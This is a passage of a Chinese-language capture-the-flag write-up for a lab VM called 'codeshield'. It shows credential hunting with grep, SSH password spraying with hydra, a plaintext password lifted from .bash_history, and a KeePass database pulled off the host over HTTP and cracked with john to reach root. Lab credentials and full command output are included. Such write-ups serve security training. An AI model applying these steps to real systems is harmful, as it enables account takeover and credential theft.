\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ ssh -o StrictHostKeyChecking=no valdezk@10.0.2.22 -p 22222\n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _WARNING: This system is restricted to authorized users!___________________________________________ |\n | | | |\n | | IT IS AN OFFENSE TO CONTINUE WITHOUT PROPER AUTHORIZATION. | |\n | | | |\n | | This system is restricted to authorized users. | | \n | | Individuals who attempt unauthorized access will be prosecuted. | | \n | | If you're unauthorized, terminate access now! | | \n | | | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________|\nvaldezk@10.0.2.22's password: \nWelcome to Ubuntu 22.04.3 LTS (GNU\/Linux 5.15.0-79-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\n * Management: https:\/\/landscape.canonical.com\n * Support: https:\/\/ubuntu.com\/advantage\n\n System information as of Fri May 30 06:36:11 AM UTC 2025\n\n System load: 0.169921875 Processes: 245\n Usage of \/: 29.4% of 47.93GB Users logged in: 0\n Memory usage: 64% IPv4 address for enp0s3: 10.0.2.22\n Swap usage: 1%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n\n10 updates can be applied immediately.\nTo see these additional updates run: apt list --upgradable\n\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\nNew release '24.04.2 LTS' available.\nRun 'do-release-upgrade' to upgrade to it.\n\nvaldezk@codeshield:~$ whoami;id;pwd\nvaldezk\nuid=1007(valdezk) gid=1007(valdezk) groups=1007(valdezk)\n\/home\/valdezk\nvaldezk@codeshield:~$ ls -la\ntotal 172\ndrwxr-x--- 18 valdezk valdezk 4096 Aug 29 2023 .\ndrwxr-xr-x 14 root root 4096 Aug 26 2023 ..\n-rw-rw-r-- 1 valdezk valdezk 0 Aug 28 2023 .bash_history\n-rw-r--r-- 1 valdezk valdezk 220 Aug 26 2023 .bash_logout\n-rw-r--r-- 1 valdezk valdezk 3771 Aug 26 2023 .bashrc\ndrwx------ 12 valdezk valdezk 4096 May 30 06:29 .cache\ndrwx------ 11 valdezk valdezk 4096 Aug 28 2023 .config\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Desktop\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Documents\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Downloads\ndrwx------ 3 valdezk valdezk 4096 Aug 28 2023 .local\ndrwx------ 3 valdezk valdezk 4096 Aug 28 2023 .mozilla\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Music\ndrwxrwxrwt 2 valdezk valdezk 4096 Aug 29 2023 .pcsc10\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Pictures\n-rw-r--r-- 1 valdezk valdezk 807 Aug 26 2023 .profile\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Public\ndrwx------ 3 valdezk valdezk 4096 Aug 28 2023 snap\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Templates\ndrwxrwxr-t 2 valdezk valdezk 4096 Aug 29 2023 thinclient_drives\ndrwx------ 6 valdezk valdezk 4096 Aug 28 2023 .thunderbird\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-clipboard-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-clipboard-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-clipboard-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-draganddrop-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-draganddrop-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-draganddrop-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-hostversion-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-hostversion-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-hostversion-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-seamless-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-seamless-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-seamless-tty4-control.pid\n-rw-r----- 1 valdezk valdezk 5 Aug 29 2023 .vboxclient-vmsvga-session-tty1-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-vmsvga-session-tty2-control.pid\n-rw-r----- 1 valdezk valdezk 6 Aug 28 2023 .vboxclient-vmsvga-session-tty4-control.pid\ndrwxr-xr-x 2 valdezk valdezk 4096 Aug 28 2023 Videos\n-rw------- 1 valdezk valdezk 56 Aug 29 2023 .Xauthority\n-rw-r--r-- 1 valdezk valdezk 18728 Aug 29 2023 .xorgxrdp.10.log\n-rw------- 1 valdezk valdezk 3985 Aug 29 2023 .xsession-errors<\/code><\/pre>\n\u53ef\u4ee5\uff01<\/p>\n
\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u627e\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\n
valdezk@codeshield:~$ grep -Pnir pass<\/code><\/pre>\n\u7136\u540e\u627e\u5230\u4e86\u4e00\u4e2a\uff1a<\/p>\n
.thunderbird\/fx2h7mhy.default-release\/ImapMail\/mail.codeshield.hmv\/INBOX:Password: D@taWh1sperer!<\/code><\/pre>\n\u7206\u7834\u65b0\u7528\u6237<\/h3>\n
\u7136\u540e\u627e\u4e00\u4e0b\u6709\u6ca1\u6709\u7c7b\u4f3c\u7684\u7528\u6237\u540d\uff1a<\/p>\n
valdezk@codeshield:~$ cut -d: -f1 \/etc\/passwd\nroot\ndaemon\nbin\nsys\nsync\ngames\nman\nlp\nmail\nnews\nuucp\nproxy\nwww-data\nbackup\nlist\nirc\ngnats\nnobody\n_apt\nsystemd-network\nsystemd-resolve\nmessagebus\nsystemd-timesync\npollinate\nsshd\nsyslog\nuuidd\ntcpdump\ntss\nlandscape\nfwupd-refresh\nusbmux\nearlyp\nlxd\nrtkit\ndnsmasq\nkernoops\nsystemd-oom\nwhoopsie\navahi-autoipd\nnm-openvpn\navahi\ncups-pk-helper\nsssd\nspeech-dispatcher\nsaned\ncolord\ngeoclue\npulse\ngnome-initial-setup\nhplip\ngdm\nvboxadd\nftp\ncowrie\nmysql\npostfix\ndovecot\ndovenull\nclamav\namavis\ndebian-spamd\nvmail\nmlmmj\niredadmin\niredapd\nnetdata\npostgres\nmitchellt\nvaldezk\ncarlsonj\nmansourm\ntanx\ncoccia\nxrdp<\/code><\/pre>\n\u548c\u4e4b\u524d\u7684\u7528\u6237\u540d\u5bf9\u6bd4\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ grep -F -f user1 user2 \nearlyp\nmitchellt\ncarlsonj\nmansourm\ntanx\ncoccia<\/code><\/pre>\n\u5b58\u5728\u51e0\u4e2a\u7528\u6237\u540d\u76f8\u540c\uff0c\u7528\u8fd9\u91cc\u7684\u7528\u6237\u540d\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield\/generate-ad-username]\n\u2514\u2500$ hydra -L user3 -p D@taWh1sperer! ssh:\/\/$IP:22222 -f\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-05-30 02:51:39\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:6\/p:1), ~1 try per task\n[DATA] attacking ssh:\/\/10.0.2.22:22222\/\n[22222][ssh] host: 10.0.2.22 login: mitchellt password: D@taWh1sperer!\n[STATUS] attack finished for 10.0.2.22 (valid pair found)\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2025-05-30 02:51:40<\/code><\/pre>\n\u5f97\u5230\u65b0\u7528\u6237\uff0c\u76f4\u63a5\u5207\u6362\uff1a<\/p>\n
valdezk@codeshield:~$ su mitchellt\nPassword: \nmitchellt@codeshield:\/home\/valdezk$ cd ~\nmitchellt@codeshield:~$ ls -la\ntotal 112\ndrwxr-x--- 17 mitchellt mitchellt 4096 Aug 30 2023 .\ndrwxr-xr-x 14 root root 4096 Aug 26 2023 ..\n-rw------- 1 mitchellt mitchellt 209 Aug 30 2023 .bash_history\n-rw-r--r-- 1 mitchellt mitchellt 220 Aug 26 2023 .bash_logout\n-rw-r--r-- 1 mitchellt mitchellt 3771 Aug 26 2023 .bashrc\ndrwx------ 11 mitchellt mitchellt 4096 May 30 06:51 .cache\ndrwx------ 12 mitchellt mitchellt 4096 Aug 29 2023 .config\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Desktop\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Documents\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Downloads\n-rw------- 1 mitchellt mitchellt 20 Aug 29 2023 .lesshst\ndrwx------ 3 mitchellt mitchellt 4096 Aug 28 2023 .local\ndrwxrwxr-x 6 mitchellt mitchellt 4096 Aug 30 2023 mining\ndrwx------ 3 mitchellt mitchellt 4096 Aug 28 2023 .mozilla\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Music\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Pictures\n-rw-r--r-- 1 mitchellt mitchellt 807 Aug 26 2023 .profile\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Public\ndrwx------ 3 mitchellt mitchellt 4096 Aug 29 2023 snap\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Templates\ndrwx------ 6 mitchellt mitchellt 4096 Aug 28 2023 .thunderbird\n-rwxrwx--- 1 mitchellt mitchellt 2401 Aug 28 2023 user.txt\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-clipboard-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-draganddrop-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-hostversion-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-seamless-tty2-control.pid\n-rw-r----- 1 mitchellt mitchellt 6 Aug 30 2023 .vboxclient-vmsvga-session-tty2-control.pid\ndrwxr-xr-x 2 mitchellt mitchellt 4096 Aug 28 2023 Videos\nmitchellt@codeshield:~$ cat user.txt \n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ \u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u255a\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2554\u255d \n @@@@@@@@@@ @@@ \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u255d \u255a\u2550\u255d\u255a\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u255d\u255a\u2550\u2550\u2550\u2550\u2550\u255d \n @@@@@@@ @@@ \n @@@@@@@ \n\n _______________________________________________________________________________________________________\n | _USER FLAG!________________________________________________________________________________________ |\n | | | |\n | | Your_password_is_the_key_to_your_digital_life | |\n | | | |\n | |___________________________________________________________________________________________________| |\n |_______________________________________________________________________________________________________| <\/code><\/pre>\nhistory\u627e\u5230\u660e\u6587\u5bc6\u7801<\/h3>\nmitchellt@codeshield:~$ cat .bash_history \necho 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r \/home\/earlyp\/Development\/mining ."\necho 'EARL!YP7DeVel@OP'| su - earlyp -c "cp -r \/home\/earlyp\/Development\/mining \/tmp"\ncp -r \/tmp\/mining .\nls\ncd mining\/\nls\nexit<\/code><\/pre>\n\u5f97\u5230\u65b0\u5bc6\u7801EARL!YP7DeVel@OP<\/code>\uff0c\u5207\u6362\u5c31\u884c\uff1a<\/p>\nmitchellt@codeshield:~$ su - earlyp\nPassword: \nearlyp@codeshield:~$ ls -la\ntotal 116\ndrwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 .\ndrwxr-xr-x 14 root root 4096 Aug 26 2023 ..\n-rw------- 1 earlyp earlyp 36 Aug 29 2023 .bash_history\n-rw-r--r-- 1 earlyp earlyp 220 Jan 6 2022 .bash_logout\n-rw-r--r-- 1 earlyp earlyp 3771 Jan 6 2022 .bashrc\ndrwx------ 12 earlyp earlyp 4096 Aug 23 2023 .cache\ndrwx------ 16 earlyp earlyp 4096 Aug 28 2023 .config\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Desktop\ndrwxrwxr-x 3 earlyp earlyp 4096 Aug 28 2023 Development\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 Documents\ndrwxr-xr-x 5 earlyp earlyp 4096 Aug 23 2023 Downloads\ndrwx------ 2 earlyp earlyp 4096 Aug 28 2023 .gnupg\ndrwx------ 3 earlyp earlyp 4096 Aug 22 2023 .local\ndrwxrwxr-x 6 earlyp earlyp 4096 Aug 29 2023 mining\ndrwxrwxr-x 2 earlyp earlyp 4096 Aug 23 2023 .mono\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Music\ndrwxr-xr-x 3 earlyp earlyp 4096 Aug 23 2023 Pictures\n-rw-r--r-- 1 earlyp earlyp 807 Jan 6 2022 .profile\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Public\n-rw-rw-r-- 1 earlyp earlyp 233 Aug 23 2023 .recently-used\ndrwx------ 3 earlyp earlyp 4096 Aug 22 2023 snap\ndrwx------ 2 earlyp earlyp 4096 Aug 22 2023 .ssh\n-rw-r--r-- 1 earlyp earlyp 0 Aug 22 2023 .sudo_as_admin_successful\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Templates\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-clipboard-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-draganddrop-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-hostversion-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-seamless-tty2-control.pid\n-rw-r----- 1 earlyp earlyp 6 Aug 28 2023 .vboxclient-vmsvga-session-tty2-control.pid\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 22 2023 Videos<\/code><\/pre>\n\u63d0\u6743root(\u65b9\u6cd5\u4e00:kdbx\u6587\u4ef6)<\/h3>\n
\u4fe1\u606f\u641c\u96c6\u53ef\u4ee5\u627e\u5230\u4e00\u4e2a.kdbx<\/code>\u6587\u4ef6\uff0c\u7834\u89e3\u4e00\u4e0b\u5373\u53ef\u5f97\u5230root\u5bc6\u7801\uff1a<\/p>\nearlyp@codeshield:~$ grep -Pnir password<\/code><\/pre>\n\u627e\u5230\u4e00\u4e2a\u5bc6\u7801\u6587\u4ef6\uff1a<\/p>\n
.cache\/keepassxc\/keepassxc.ini:2:LastActiveDatabase=\/home\/earlyp\/Documents\/Passwords.kdbx\n.cache\/keepassxc\/keepassxc.ini:4:LastDatabases=\/home\/earlyp\/Documents\/Passwords.kdbx\n.cache\/keepassxc\/keepassxc.ini:6:LastOpenedDatabases=\/home\/earlyp\/Documents\/Passwords.kdbx<\/code><\/pre>\n\u62f7\u8d1d\u5230\u672c\u5730\u8fdb\u884c\u7834\u89e3\uff1a<\/p>\n
earlyp@codeshield:~$ cd Documents\/\nearlyp@codeshield:~\/Documents$ ls -la\ntotal 12\ndrwxr-xr-x 2 earlyp earlyp 4096 Aug 28 2023 .\ndrwxr-x--- 19 earlyp earlyp 4096 Aug 29 2023 ..\n-rw------- 1 earlyp earlyp 1918 Aug 28 2023 Passwords.kdbx\nearlyp@codeshield:~\/Documents$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n10.0.2.4 - - [30\/May\/2025 07:05:05] "GET \/Passwords.kdbx HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ wget http:\/\/$IP:8888\/Passwords.kdbx\n--2025-05-30 03:26:21-- http:\/\/10.0.2.22:8888\/Passwords.kdbx\nConnecting to 10.0.2.22:8888... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 1918 (1.9K) [application\/octet-stream]\nSaving to: \u2018Passwords.kdbx\u2019\n\nPasswords.kdbx 100%[====================================================================================================>] 1.87K --.-KB\/s in 0s \n\n2025-05-30 03:26:21 (198 MB\/s) - \u2018Passwords.kdbx\u2019 saved [1918\/1918]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ keepass2john Passwords.kdbx > hash\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/codeshield]\n\u2514\u2500$ john hash --wordlist=pass \nUsing default input encoding: UTF-8\nLoaded 1 password hash (KeePass [SHA256 AES 32\/64])\nCost 1 (iteration count) is 3225806 for all loaded hashes\nCost 2 (version) is 2 for all loaded hashes\nCost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes\nWill run 2 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:04 DONE (2025-05-30 03:27) 0g\/s 2.309p\/s 2.309c\/s 2.309C\/s Xxxxxxxxx002..Xxxxxxxxxx01\nSession completed. <\/code><\/pre>\n\u90a3\u53ea\u80fdrockyou<\/code>\u4e86\uff0c\u8fd9\u91cc\u5feb\u901f\u527d\u7a83\u4e86\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\nmandalorian<\/code><\/pre>\n\u53bb\u5728\u7ebf\u7684\u7ba1\u7406\u5668\u4e0a\u770b\u4e00\u4e0b\u5bc6\u7801\uff1a<\/p>\n
<\/div><\/p>\nroot:7%z5,c9=w6[x8=<\/code><\/pre>\n\u5207\u6362\u7528\u6237\u62ff\u5230rootshell\uff01<\/p>\n
earlyp@codeshield:~\/Documents$ su - root\nPassword: \nroot@codeshield:~# ls -la\ntotal 92\ndrwx------ 9 root root 4096 Aug 26 2023 .\ndrwxr-xr-x 19 root root 4096 Aug 22 2023 ..\n-rw------- 1 root root 0 Aug 30 2023 .bash_history\n-rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc\ndrwx------ 2 root root 4096 Aug 28 2023 .cache\ndrwxr-xr-x 2 root root 4096 Aug 26 2023 cowrie\ndrwxr-xr-x 3 root root 4096 Aug 26 2023 .iredmail\ndrwx------ 3 root root 4096 Aug 23 2023 .launchpadlib\n-rw------- 1 root root 20 Aug 23 2023 .lesshst\ndrwxr-xr-x 3 root root 4096 Aug 22 2023 .local\n-r-------- 1 root root 45 Aug 26 2023 .my.cnf\n-rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-amavisd\n-rw-r--r-- 1 root root 92 Aug 26 2023 .my.cnf-fail2ban\n-rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-iredadmin\n-rw-r--r-- 1 root root 91 Aug 26 2023 .my.cnf-iredapd\n-rw-r--r-- 1 root root 93 Aug 26 2023 .my.cnf-roundcube\n-r-------- 1 root root 89 Aug 26 2023 .my.cnf-vmail\n-r-------- 1 root root 94 Aug 26 2023 .my.cnf-vmailadmin\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 2528 Aug 26 2023 root.txt\n-rw-r--r-- 1 root root 66 Aug 26 2023 .selected_editor\ndrwx------ 4 root root 4096 Aug 22 2023 snap\ndrwx------ 2 root root 4096 Aug 22 2023 .ssh\n-rw-r--r-- 1 root root 0 Aug 22 2023 .sudo_as_admin_successful\n-rw-r--r-- 1 root root 290 Aug 26 2023 .wget-hsts\nroot@codeshield:~# cat root.txt \n\n @@@ \n @@@@@@@@@ @@@@@@ \n @@@@@@@@@@@@@@ (@@ \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2557\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \n @@@@@@@@@@@@@@ @@ \u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2550\u2550\u255d\u2588\u2588\u2551 \u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2557 \n @@@@@@@@@@@@@ @@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2557\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@@@ @@@ \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2551 \u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u255a\u2550\u2550\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u2588\u2588\u2551\u2588\u2588\u2551\u2588\u2588\u2554\u2550\u2550\u255d \u2588\u2588\u2551 \u2588\u2588\u2551 \u2588\u2588\u2551 \n @@@@@@@@@@@ @@ 